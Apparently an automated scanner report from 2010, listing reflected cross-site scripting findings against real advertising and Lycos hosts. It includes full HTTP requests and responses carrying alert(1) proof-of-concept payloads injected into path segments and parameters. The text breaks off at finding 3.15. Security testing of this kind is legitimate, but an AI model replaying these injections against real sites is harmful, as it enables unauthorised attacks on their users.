The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/ad/cm.idg_b2c/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.idg_b2c/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa4f7<script>alert(1)</script>eae69146b28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adfa4f7<script>alert(1)</script>eae69146b28/cm.idg_b2c/ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 69
Date: Sun, 12 Dec 2010 14:26:56 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

unknown path /adfa4f7<script>alert(1)</script>eae69146b28/cm.idg_b2c/

3.2. http://a.collective-media.net/ad/idgt.lycos/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/idgt.lycos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27ca2<script>alert(1)</script>2c491182556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad27ca2<script>alert(1)</script>2c491182556/idgt.lycos/;tile=1;sz=728x90;ord=123456789?\ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 109
Date: Sun, 12 Dec 2010 14:26:55 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

unknown path /ad27ca2<script>alert(1)</script>2c491182556/idgt.lycos/;tile=1;cmw=nurl;sz=728x90;ord=123456789

3.3. http://a.collective-media.net/adj/cm.idg_b2c/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.idg_b2c/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf0b'-alert(1)-'46a749859b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.idg_b2cdbf0b'-alert(1)-'46a749859b1/;sz=728x90;ord=5241744? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 435
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:39 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.idg_b2cdbf0b'-alert(1)-'46a749859b1/;sz=728x90;net=cm;ord=5241744;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/cm.idg_b2c/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.idg_b2c/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3623'-alert(1)-'5d6c2e0b2b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.idg_b2c/;sz=728x90;ord=5241744?&f3623'-alert(1)-'5d6c2e0b2b0=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 439
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.idg_b2c/;sz=728x90;net=cm;ord=5241744?&f3623'-alert(1)-'5d6c2e0b2b0=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/adj/cm.idg_b2c/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.idg_b2c/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e57e3'-alert(1)-'64cfe680192 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.idg_b2c/;sz=728x90;ord=5241744?e57e3'-alert(1)-'64cfe680192 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 436
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.idg_b2c/;sz=728x90;net=cm;ord=5241744?e57e3'-alert(1)-'64cfe680192;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.6. http://a.collective-media.net/adj/idgt.lycos/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.lycos/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93955'-alert(1)-'f68ab19aedd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.lycos93955'-alert(1)-'f68ab19aedd/;tile=1;sz=728x90;ord=123456789? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:39 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.lycos93955'-alert(1)-'f68ab19aedd/;tile=1;sz=728x90;net=idgt;ord=123456789;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.7. http://a.collective-media.net/adj/idgt.lycos/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.lycos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e41'-alert(1)-'e57b49161fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.lycos/;tile=1;sz=728x90;ord=123456789?&c7e41'-alert(1)-'e57b49161fd=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789?&c7e41'-alert(1)-'e57b49161fd=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.8. http://a.collective-media.net/adj/idgt.lycos/ [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.lycos/

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a4b'-alert(1)-'bb4ad577c5f was submitted in the tile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.lycos/;tile=1;sz=728x90;ord=123456789?56a4b'-alert(1)-'bb4ad577c5f HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789?56a4b'-alert(1)-'bb4ad577c5f;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.9. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d086f'-alert(1)-'0c5afc10a60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjd086f'-alert(1)-'0c5afc10a60/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789;env=ifr;ord1=795724;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7161

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-75049847_1292163999","http://ad.doubleclick.net/adjd086f'-alert(1)-'0c5afc10a60/idgt.lycos/;net=idgt;u=,idgt-75049847_1292163999,,webdevelopment,;;tile=1;cmw=owl;sz=728x90;net=idgt;env=ifr;ord1=795724;contx=webdevelopment;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt>
...[SNIP]...

3.10. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f15f'-alert(1)-'146c6c088c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.lycos9f15f'-alert(1)-'146c6c088c2/;tile=1;sz=728x90;net=idgt;ord=123456789;env=ifr;ord1=795724;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7153

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-61396396_1292163999","http://ad.doubleclick.net/adj/idgt.lycos9f15f'-alert(1)-'146c6c088c2/;net=idgt;u=,idgt-61396396_1292163999,,webdevelopment,;;tile=1;sz=728x90;net=idgt;env=ifr;ord1=795724;contx=webdevelopment;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt>
...[SNIP]...

3.11. http://a.collective-media.net/cmadj/idgt.lycos/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 717c5'-alert(1)-'3504f397cdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789;&717c5'-alert(1)-'3504f397cdd=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 12 Dec 2010 14:26:57 GMT
Content-Length: 7117
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
pt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-96303716_1292164017","http://ad.doubleclick.net/adj/idgt.lycos/;net=idgt;u=,idgt-96303716_1292164017,,none,;;tile=1;sz=728x90;net=idgt;&717c5'-alert(1)-'3504f397cdd=1;contx=none;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt>
...[SNIP]...

3.12. http://a.collective-media.net/cmadj/idgt.lycos/ [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49010'-alert(1)-'a3461bb3ff4 was submitted in the tile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.lycos/;tile=49010'-alert(1)-'a3461bb3ff4 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7074

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-3700236_1292163998","http://ad.doubleclick.net/adj/idgt.lycos/;net=idgt;u=,idgt-3700236_1292163998,,none,;;tile=49010'-alert(1)-'a3461bb3ff4;contx=none;dc=d;btg=?","0","0",false);</scr'+'ipt>
...[SNIP]...

3.13. http://advertising.lycos.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 842fd"><script>alert(1)</script>7285f314683 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi&cat=images842fd"><script>alert(1)</script>7285f314683 HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images842fd"><script>alert(1)</script>7285f314683&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

3.14. http://advertising.lycos.com/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce66"><script>alert(1)</script>ebf8b4cdc1d was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi9ce66"><script>alert(1)</script>ebf8b4cdc1d&cat=images HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi9ce66"><script>alert(1)</script>ebf8b4cdc1d&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

3.15. http://blog.gamesville.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /

Issue detail

